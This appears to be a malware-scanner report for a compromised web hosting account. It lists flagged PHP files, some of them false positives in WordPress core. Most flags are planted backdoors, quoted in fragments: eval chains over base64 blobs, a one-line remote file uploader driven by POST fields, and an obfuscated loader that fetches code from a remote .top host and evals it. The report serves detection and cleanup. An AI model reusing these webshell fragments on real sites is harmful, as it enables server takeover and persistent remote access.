Exploit nano Line: 3707 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $p_options[PCLZIP_CB_PRE_EXTRACT](PCLZIP_CB_PRE_EXTRACT, $v_local_header)`
Exploit nano Line: 3958 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $p_options[PCLZIP_CB_POST_EXTRACT](PCLZIP_CB_POST_EXTRACT, $v_local_header)`
Sign 963e968a Line: 5717 Dangerous Malware Signature (hash: 963e968a)	`<?php php_uname()`

/custdata02/turtle/public_html/recipes/wp-admin/includes/class-wp-filesystem-direct.php

Size: 17.72 kB Created: 2024-04-03 07:03:01 Modified: 2024-06-01 08:12:18 Warns: 1

Description Match

Function posix_getpwuid Warning

Potentially dangerous function `posix_getpwuid`

<?php posix_getpwuid( $owneruid ); if ( ! $ownerarray ) { return false; } return $ownerarray['name']; } public function getchmod( $file ) { return substr( decoct( @fileperms( $file ) ), -3 ); } public function group( $file ) { $gid = @filegroup( $file ); if ( ! $gid ) { return false; } if ( ! function_exists( 'posix_getgrgid' ) ) { return $gid; } $grouparray = posix_getgrgid( $gid ); if ( ! $grouparray ) { return false; } return $grouparray['name']; } public function copy( $source, $destination, $over...

/custdata02/turtle/public_html/recipes/wp-admin/includes/class-wp-debug-data.php

Size: 59.19 kB Created: 2024-04-03 07:03:01 Modified: 2024-06-01 08:12:18 Warns: 1 Dangers: 3

Description	Match
Exploit php_uname Line: 693 Dangerous RCE (Remote Code Execution) allow remote attackers to execute arbitrary commands or code on the target machine	`<?php php_uname( 'm' )`
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec]	<?php exec( 'gs --version' ); if ( empty( $gs ) ) { $gs = $not_available; $gs_debug = 'not available'; } else { $gs_debug = $gs; } } else { $gs = __( 'Unable to determine if Ghostscript is installed' ); $gs_debug = 'unknown'; } $info['wp-media']['fields']['ghostscript_version'] = array( 'label' => __( 'Ghostscript version' ), 'value' => $gs, 'debug' => $gs_debug, ); if ( function_exists( 'php_uname' ) ) { $server_architecture = sprintf( '%s %s %s', php_uname( 's' ), php_uname( 'r' ), php_uname( 'm' ) ...
Sign 471b95ee Line: 799 Dangerous Malware Signature (hash: 471b95ee)	`<?php SUHOSIN`
Sign 471b95ee Line: 800 Dangerous Malware Signature (hash: 471b95ee)	`<?php suhosin`

/custdata02/turtle/public_html/recipes/wp-admin/includes/class-wp-filesystem-ssh2.php

Size: 22.76 kB Created: 2024-04-03 07:03:01 Modified: 2024-06-01 08:12:18 Warns: 1

Description Match

Function posix_getpwuid Warning

Potentially dangerous function `posix_getpwuid`

<?php posix_getpwuid( $owneruid ); if ( ! $ownerarray ) { return false; } return $ownerarray['name']; } public function getchmod( $file ) { return substr( decoct( @fileperms( $this->sftp_path( $file ) ) ), -3 ); } public function group( $file ) { $gid = @filegroup( $this->sftp_path( $file ) ); if ( ! $gid ) { return false; } if ( ! function_exists( 'posix_getgrgid' ) ) { return $gid; } $grouparray = posix_getgrgid( $gid ); if ( ! $grouparray ) { return false; } return $grouparray['name']; } public fun...

/custdata02/turtle/public_html/recipes/wp-admin/includes/file.php

Size: 96.08 kB Created: 2024-04-03 07:03:01 Modified: 2024-06-01 08:12:18 Dangers: 1

Description	Match
Exploit nano Line: 794 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $overrides['upload_error_handler']( &$file, $message )`

/custdata02/turtle/public_html/recipes/wp-admin/includes/ms.php

Size: 33.13 kB Created: 2024-04-03 07:03:01 Modified: 2024-06-01 08:12:18 Dangers: 1

Description	Match
Function str_rot13 eval_str_rot13 Line: 518 Dangerous Encoded Function `eval` [https://www.php.net/eval]	`<?php riny`

/custdata02/turtle/public_html/click.php

Size: 51.87 kB Created: 2022-08-10 00:39:41 Modified: 2024-06-04 00:39:41 Warns: 2 Dangers: 1

Description Match

Exploit base64_long Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'IHJlZWJlX2VyY2JlZ3ZhdChSX05ZWV5SX0FCR1ZQUik7cXJzdmFyKCfLpvgnLCAnjScpOyRUWUJPTllGW8um+F0gPSBya2N5YnFyKCd8BHwEfAInLCB0bXZhc3luZ3IoZmhvZmdlKCcfiwgAAAAAAAAKLJ3XjttDZ1KBIF8TPrC3VBaJvWq+BOy9iJ1RPj6cOB7YcBmQKN57zj54VrSmLi4kesb/+c/36z/+/Sn+17/vKIxP72L8/2JO/74jOYqiOAr/u/XffhT3//6aJnhOYP+dF9mUF//+6YBlZj+8x+LJ/tq/8G86Tw3pTMHqs/dgflhY3e9UQZWWGfHd+urvo83O6nXjBzYw5ZIQg0o06jNJZCAXqy9I0vkblDQgVT42H82IdhdqovmLfgmmWAh6eiNL+/CxKP9gXFyqvo82OZ6lTo2JMjeCl5vhnsLGoUc1HqF3YBmCqb/voCBMFF2RVGg6kdi+jDpsEt5VY+WrsVNVzCPLRqO...

Function eval Warning

Potentially dangerous function `eval`

<?php eval($HCdot($Ztvaw('IHJlZWJlX2VyY2JlZ3ZhdChSX05ZWV5SX0FCR1ZQUik7cXJzdmFyKCfLpvgnLCAnjScpOyRUWUJPTllGW8um+F0gPSBya2N5YnFyKCd8BHwEfAInLCB0bXZhc3luZ3IoZmhvZmdlKCcfiwgAAAAAAAAKLJ3XjttDZ1KBIF8TPrC3VBaJvWq+BOy9iJ1RPj6cOB7YcBmQKN57zj54VrSmLi4kesb/+c/36z/+/Sn+17/vKIxP72L8/2JO/74jOYqiOAr/u/XffhT3//6aJnhOYP+dF9mUF//+6YBlZj+8x+LJ/tq/8G86Tw3pTMHqs/dgflhY3e9UQZWWGfHd+urvo83O6nXjBzYw5ZIQg0o06jNJZCAXqy9I0vkblDQgVT42H82IdhdqovmLfgmmWAh6eiNL+/CxKP9gXFyqvo82OZ6lTo2JMjeCl5vhnsLGoUc1HqF3YBmCqb/voCBMFF2RVGg6kdi+jDps...

Sign f9dc0a55 Dangerous

Malware Signature (hash: f9dc0a55)

<?php 'base64_decode'

/custdata02/turtle/public_html/turtlesystems.us/M1n3raegfTq.php

Size: 43.48 kB Created: 2024-06-04 19:34:42 Modified: 2024-06-04 19:34:42 Warns: 2 Dangers: 1

Description Match

Exploit base64_long Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'QbhXIRHo/dbKpv/Ny3X8vP/GuWFFk5WMN0y2B3q54C81VpXtXi3JnTAqrbl1PaiT91wXfpWHbJyxRsf6AWT+xAl9a7pjyZpeMPTwfcWfdYwyW9ws8nXJQjx9kNf2YdYMK+7R8u+NGDUtL0t0qrt2fggS5PHf6pVEFyLo4IXcPCmVj7W1tOu7SFfLnCKHFG6fNLvFXOyy0t9FZjJ5TDMtDBrKaCNdTOU2XOpF0JmZp4BTVweIKPcR8iDIqGk1k8H2EogAyFUSqlTcLMAEYpZmgBkW6lMlpTfP0IxFKI85COyTvsHQ5RRU9k3+DDIDvMik5z3Oe5NmVX2CCCJSpH7d9/6NzmHaRAsM6WeSlCKTnBTrCHAi8xHMfmQixSHkPiv9FDDDWF1EtWZrcnUkKGF2bzJrcnUgYWJ2Z3BhaHN7KSldMFtdo8RbRllOT0JZVCQoZmdmdmtyX2FidmdwYWhzIShzdgo7KSkpOC0gLG4wazAsJwAApyL...

Function eval Warning

Potentially dangerous function `eval`

<?php eval($SIunp($udwGf($IgvuO($xqlbS('QbhXIRHo/dbKpv/Ny3X8vP/GuWFFk5WMN0y2B3q54C81VpXtXi3JnTAqrbl1PaiT91wXfpWHbJyxRsf6AWT+xAl9a7pjyZpeMPTwfcWfdYwyW9ws8nXJQjx9kNf2YdYMK+7R8u+NGDUtL0t0qrt2fggS5PHf6pVEFyLo4IXcPCmVj7W1tOu7SFfLnCKHFG6fNLvFXOyy0t9FZjJ5TDMtDBrKaCNdTOU2XOpF0JmZp4BTVweIKPcR8iDIqGk1k8H2EogAyFUSqlTcLMAEYpZmgBkW6lMlpTfP0IxFKI85COyTvsHQ5RRU9k3+DDIDvMik5z3Oe5NmVX2CCCJSpH7d9/6NzmHaRAsM6WeSlCKTnBTrCHAi8xHMfmQixSHkPiv9FDDDWF1EtWZrcnUkKGF2bzJrcnUgYWJ2Z3BhaHN7KSldMFtdo8RbRllOT0JZVCQoZmdmdmtyX2FidmdwYW...

Sign f9dc0a55 Dangerous

Malware Signature (hash: f9dc0a55)

<?php 'base64_decode'

/custdata02/turtle/public_html/turtlesystems.us/W23VXRZEjsi.php

Size: 166.77 kB Created: 2024-06-04 19:34:42 Modified: 2024-06-04 19:34:42 Dangers: 2

Description	Match
Sign 963e968a Line: 4341 Dangerous Malware Signature (hash: 963e968a)	`<?php php_uname()`
Sign a408f408 Line: 1732 Dangerous Malware Signature (hash: a408f408)	`<?php cmd.exe`

/custdata02/turtle/public_html/turtlesystems.us/ibC9oY2erOE.php

Size: 51.81 kB Created: 2024-06-04 19:34:42 Modified: 2024-06-04 19:34:42 Warns: 2 Dangers: 3

Description	Match
Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	<?php 'VTIlpz9lK3WypT9lqTyhMluSK0SZGS5SK05CIRyQEFx7MTIznJ5yXPsYcitaYPNawFpcBlEUGR9PDHkGJ8hz+S0tCFOyrUOfo2EyXPq8OUjRsNVaYPOarzyhMzkuqTHbp3Ivp3ElXPpsvjtNNNNNNNNXYW3KwggDqRJOVS8GCeP3EknWiKr+OBl9vW1RCw6pBO7LLkzDXA57mw5eFoFzYv4xopo/+p/36m/+/Fa+17/iXVkP72/8/29O/74wBLdvBNe/h/KssuG3//6nWzgOLC+qS9zHS//+6LOlpm+8k+YW/gd/8TV6Dt3cJpUdf/qtsxgY3r9UGcJJTsUq+heib83B6zwwOmLj5MVDt1p06wAJpFNKdl9I0ixoyQDtFQ42U82VnEq3bizYstzzFjugoFAL+/PkXC9tKSldib82BM6yDL2WZwrPy5iuafYTbID1UdSdLOzPdo/ibPOMSS2EE3H6xqv+wQc5Rg5VpBJefHMVmPCYH6B...
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval]	<?php eval($MuUwa($tIRhZ('VTIlpz9lK3WypT9lqTyhMluSK0SZGS5SK05CIRyQEFx7MTIznJ5yXPsYcitaYPNawFpcBlEUGR9PDHkGJ8hz+S0tCFOyrUOfo2EyXPq8OUjRsNVaYPOarzyhMzkuqTHbp3Ivp3ElXPpsvjtNNNNNNNNXYW3KwggDqRJOVS8GCeP3EknWiKr+OBl9vW1RCw6pBO7LLkzDXA57mw5eFoFzYv4xopo/+p/36m/+/Fa+17/iXVkP72/8/29O/74wBLdvBNe/h/KssuG3//6nWzgOLC+qS9zHS//+6LOlpm+8k+YW/gd/8TV6Dt3cJpUdf/qtsxgY3r9UGcJJTsUq+heib83B6zwwOmLj5MVDt1p06wAJpFNKdl9I0ixoyQDtFQ42U82VnEq3bizYstzzFjugoFAL+/PkXC9tKSldib82BM6yDL2WZwrPy5iuafYTbID1UdSdLOzPdo/ibPOMSS2EE3H6xqv+wQc5...
Function strrev eval_strrev Line: 1 Dangerous Encoded Function `eval` [https://www.php.net/eval]	`<?php LAve`
Sign 7830f7a6 Line: 1 Dangerous Malware Signature (hash: 7830f7a6)	`<?php N0YX`
Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55)	`<?php 'base64_decode'`

/custdata02/turtle/public_html/turtlesystems.us/FeNprsLOu4g.php

Size: 38.68 kB Created: 2024-06-04 19:34:42 Modified: 2024-06-04 19:34:42 Warns: 1

Description	Match
Function eval Line: 164 Warning Potentially dangerous function `eval` [https://www.php.net/eval]	`<?php eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(_TOpUgAAnRVE2EiM5($GLOBALS[˦�][0x00008])))))))))))))))))))`

/custdata02/turtle/public_html/turtlesystems.us/theme-insypuc.php

Size: 338.00 B Created: 2024-06-04 19:34:42 Modified: 2024-06-04 19:34:42 Dangers: 2

Description	Match
Exploit download_remote_code2 Line: 1 Dangerous RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine	`<?php fwrite(fopen(trim($_POST['name']), 'w'), $b4(trim($_POST['message'])`
Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55)	`<?php 'base64_decode'`

/custdata02/turtle/public_html/turtlesystems.us/jGNxdIApXTD.php

Size: 43.51 kB Created: 2024-06-04 19:51:13 Modified: 2024-06-04 19:51:13 Warns: 2 Dangers: 1

Description Match

Exploit base64_long Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'eJy0/FOUbk0QJgyWbdu2bduut2zbtm3rlG3btk7Ztnnm6/5X96yZ7qtZa/Jirx2ZkZFPPDt2ZsRN8lL/35oeF9N/zYZJV69kRFdCW0FRRFuNjEpKxM5BW1peSotT1chJWVhcW92Aysveyvn/zw8/3v8BScfJQUvZgIxKx9zFxoDKQVKVm8lF4j/Z2cLey8XI3c6VysrZzMzCnMjIzNLC2Yz3f2t42TsYe7nyemrL2tpwmyv+rw6f/23x/+IWkZGxu4WjkaULrx7n/0kE//+2zavH8X+O/r9X8uM1cpaQdZA1IPtfqP4Ht+z/B7FG7g4sNs5uVNQWRu5UdP+psDH93/j//1T7X6ap/nPawdKc/3/J/3MN1v/f5/tQ/++R/8n1/+bC7z933B3M/5cvfrws/3MNflr3/xx1JONn+J+jPs7mXs7/U/5/RGomfn53MioXd15qezI6PZb/Cy5PR3sTfsf/gP8/g3TuZHT/YfoP6f/GZv8/UJH...

Function eval Warning

Potentially dangerous function `eval`

<?php eval($fpwQi($fCjKH($LElTj($HJrhk('eJy0/FOUbk0QJgyWbdu2bduut2zbtm3rlG3btk7Ztnnm6/5X96yZ7qtZa/Jirx2ZkZFPPDt2ZsRN8lL/35oeF9N/zYZJV69kRFdCW0FRRFuNjEpKxM5BW1peSotT1chJWVhcW92Aysveyvn/zw8/3v8BScfJQUvZgIxKx9zFxoDKQVKVm8lF4j/Z2cLey8XI3c6VysrZzMzCnMjIzNLC2Yz3f2t42TsYe7nyemrL2tpwmyv+rw6f/23x/+IWkZGxu4WjkaULrx7n/0kE//+2zavH8X+O/r9X8uM1cpaQdZA1IPtfqP4Ht+z/B7FG7g4sNs5uVNQWRu5UdP+psDH93/j//1T7X6ap/nPawdKc/3/J/3MN1v/f5/tQ/++R/8n1/+bC7z933B3M/5cvfrws/3MNflr3/xx1JONn+J+jPs7mXs7/U/5/RGomfn53MioXd15qezI6PZb/Cy5PR3...

Sign f9dc0a55 Dangerous

Malware Signature (hash: f9dc0a55)

<?php 'base64_decode'

/custdata02/turtle/public_html/turtlesystems.us/Ck7jqwNYd9s.php

Size: 166.77 kB Created: 2024-06-04 19:51:13 Modified: 2024-06-04 19:51:13 Dangers: 2

Description	Match
Sign 963e968a Line: 4341 Dangerous Malware Signature (hash: 963e968a)	`<?php php_uname()`
Sign a408f408 Line: 1732 Dangerous Malware Signature (hash: a408f408)	`<?php cmd.exe`

/custdata02/turtle/public_html/turtlesystems.us/DtnZ8cwqovr.php

Size: 51.33 kB Created: 2024-06-04 19:51:13 Modified: 2024-06-04 19:51:13 Warns: 2 Dangers: 2

Description	Match
Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	<?php 'eJy091O0bk0QJQpunm3rbNu2bdvftm3btm3btm3btnn6r7q3atzurqceo/NhjRWZEZEz5lqRGcFN+f89dDgY/hvuDNo676VT2soygkLyMuIkFKyyFqJMompKtoKCZqr28ip6FNYGrib/f3n4cP8PHPIiIk4KZnZ6JBTWWppqehRWHKbG4lLSKur/zZg4G1ib2lp4mlG4mjg6OjsR2Dq6OJs4cv8/dKwNDO2szbilHDXl2P6X5PX/cPr/FQ+BrZ2Fs5Gtiym3Dvv/gQDe/4dvbh22/4PC/72VDzenqKahjR7J/wL1Pzhl/f8m1NbCkMndxJyC0tnWgoLmPx0Whv8j8f/vev+3b4r/gjZ0ceL9v8X/uQfz/8/mXpT/a/5/Uv2/mfDx4f7P3Ol/ReLDzfQ/d+CltvgvSiMSXrr/uepl4mRt8j/l/0ukZODltSChMLXgpjQgodFh+j+hsjIysOc1+g/3/7VKY0FC8x+k/3D+b2gG/zmyJeH...
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval]	<?php eval($UbskV($gbWJv($UMwGZ('eJy091O0bk0QJQpunm3rbNu2bdvftm3btm3btm3btnn6r7q3atzurqceo/NhjRWZEZEz5lqRGcFN+f89dDgY/hvuDNo676VT2soygkLyMuIkFKyyFqJMompKtoKCZqr28ip6FNYGrib/f3n4cP8PHPIiIk4KZnZ6JBTWWppqehRWHKbG4lLSKur/zZg4G1ib2lp4mlG4mjg6OjsR2Dq6OJs4cv8/dKwNDO2szbilHDXl2P6X5PX/cPr/FQ+BrZ2Fs5Gtiym3Dvv/gQDe/4dvbh22/4PC/72VDzenqKahjR7J/wL1Pzhl/f8m1NbCkMndxJyC0tnWgoLmPx0Whv8j8f/vev+3b4r/gjZ0ceL9v8X/uQfz/8/mXpT/a/5/Uv2/mfDx4f7P3Ol/ReLDzfQ/d+CltvgvSiMSXrr/uepl4mRt8j/l/0ukZODltSChMLXgpjQgodFh+j+hsjIysOc1+g/3/...
Sign 7830f7a6 Line: 1 Dangerous Malware Signature (hash: 7830f7a6)	`<?php n0CL`
Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55)	`<?php 'base64_decode'`

/custdata02/turtle/public_html/turtlesystems.us/iydn5AR29Cw.php

Size: 38.68 kB Created: 2024-06-04 19:51:13 Modified: 2024-06-04 19:51:13 Warns: 1

Description	Match
Function eval Line: 164 Warning Potentially dangerous function `eval` [https://www.php.net/eval]	`<?php eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(_TOpUgAAnRVE2EiM5($GLOBALS[˦�][0x00008])))))))))))))))))))`

/custdata02/turtle/public_html/turtlesystems.us/theme-insifqu.php

Size: 338.00 B Created: 2024-06-04 19:51:13 Modified: 2024-06-04 19:51:13 Dangers: 2

Description	Match
Exploit download_remote_code2 Line: 1 Dangerous RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine	`<?php fwrite(fopen(trim($_POST['name']), 'w'), $b4(trim($_POST['message'])`
Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55)	`<?php 'base64_decode'`

/custdata02/turtle/ssl/certs/index.php

Size: 15.44 kB Created: 2024-06-01 05:39:22 Modified: 2024-06-01 05:39:22 Warns: 2 Dangers: 11

Description	Match
Exploit base64_long Line: 8 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	`<?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"`
Exploit escaped_path Line: 7 Dangerous Escaped path technique is usually used for the obfuscation of malicious code	`<?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ`
Exploit global_var_string Dangerous Code Injection, through escaped global vars, allow inject attackers to execute PHP code on the target machine via HTTP request	`<?php ${"_GET"}`
Exploit hex_char Line: 2 Dangerous Hex char is usually used for the obfuscation of malicious code	`<?php \x5f`
Exploit hex_var Line: 2 Dangerous Hex var technique is usually used for the obfuscation of malicious code, it is also used by IonCube	`<?php ${"\x47\x4c\x4f\x42\x41\x4c\x53"}`
Function eval Line: 9 Warning Potentially dangerous function `eval` [https://www.php.net/eval]	`<?php eval($co($ro($na($AmInE))))`
Sign 237750ea Line: 2 Dangerous Malware Signature (hash: 237750ea)	`<?php \x47\x4c\x4f\x42\x41\x4c\x53`
Sign 301ca578 Dangerous Malware Signature (hash: 301ca578)	`<?php trojan`
Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999)	`<?php d6aW5mbGF0Z`
Sign 407651f7 Line: 2 Dangerous Malware Signature (hash: 407651f7)	`<?php w/cGhw`
Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf)	`<?php Jhc2U2N`
Sign d97f004d Dangerous Malware Signature (hash: d97f004d)	`<?php ZXZhb`
Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55)	`<?php 'base64_decode'`

/custdata02/turtle/ssl/certs/admin.php

Size: 1.49 kB Created: 2023-09-06 04:18:11 Modified: 2024-06-01 04:18:11 Warns: 2 Dangers: 5

Description	Match
Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	`<?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"`
Exploit escaped_path Line: 5 Dangerous Escaped path technique is usually used for the obfuscation of malicious code	`<?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ`
Function eval Line: 7 Warning Potentially dangerous function `eval` [https://www.php.net/eval]	`<?php eval($co($ro($na($AmInE))))`
Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999)	`<?php d6aW5mbGF0Z`
Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf)	`<?php Jhc2U2N`
Sign d97f004d Dangerous Malware Signature (hash: d97f004d)	`<?php ZXZhb`
Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55)	`<?php 'base64_decode'`

/custdata02/turtle/ssl/certs/wp-blog-header.php

Size: 2.74 kB Created: 2024-06-01 06:19:42 Modified: 2024-06-01 06:19:42 Warns: 1 Dangers: 2

Description Match

Exploit hex_char Line: 2 Dangerous

Hex char is usually used for the obfuscation of malicious code

<?php \x5f

Function eval Dangerous

Encoded Function `eval`

<?php eval("\77>" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["doact"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["doact"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "http\72/\57hknxoe\56byhot.top/index.php"; goto W3zBw; TQ2d2: $cRR8Z = c...

Function eval Line: 2 Warning

Potentially dangerous function `eval`

<?php eval("\77\x3e" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["\x64\157\141\143\x74"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["\144\x6f\x61\143\164"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "\150\164\x74\x70\72\x2f\57\150\x6b\x6e...

/custdata02/turtle/ssl/csrs/themes.php

Size: 1.49 kB Created: 2023-02-07 04:18:11 Modified: 2024-06-01 04:18:11 Warns: 2 Dangers: 5

Description	Match
Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	`<?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"`
Exploit escaped_path Line: 5 Dangerous Escaped path technique is usually used for the obfuscation of malicious code	`<?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ`
Function eval Line: 7 Warning Potentially dangerous function `eval` [https://www.php.net/eval]	`<?php eval($co($ro($na($AmInE))))`
Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999)	`<?php d6aW5mbGF0Z`
Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf)	`<?php Jhc2U2N`
Sign d97f004d Dangerous Malware Signature (hash: d97f004d)	`<?php ZXZhb`
Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55)	`<?php 'base64_decode'`

/custdata02/turtle/ssl/csrs/about.php

Size: 1.49 kB Created: 2023-04-23 04:18:11 Modified: 2024-06-01 04:18:11 Warns: 2 Dangers: 5

Description	Match
Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	`<?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"`
Exploit escaped_path Line: 5 Dangerous Escaped path technique is usually used for the obfuscation of malicious code	`<?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ`
Function eval Line: 7 Warning Potentially dangerous function `eval` [https://www.php.net/eval]	`<?php eval($co($ro($na($AmInE))))`
Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999)	`<?php d6aW5mbGF0Z`
Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf)	`<?php Jhc2U2N`
Sign d97f004d Dangerous Malware Signature (hash: d97f004d)	`<?php ZXZhb`
Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55)	`<?php 'base64_decode'`

/custdata02/turtle/ssl/csrs/wp-blog-header.php

Size: 2.74 kB Created: 2024-06-01 06:19:42 Modified: 2024-06-01 06:19:42 Warns: 1 Dangers: 2

Description Match

Exploit hex_char Line: 2 Dangerous

Hex char is usually used for the obfuscation of malicious code

<?php \x5f

Function eval Dangerous

Encoded Function `eval`

<?php eval("\77>" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["doact"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["doact"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "http\72/\57hknxoe\56byhot.top/index.php"; goto W3zBw; TQ2d2: $cRR8Z = c...

Function eval Line: 2 Warning

Potentially dangerous function `eval`

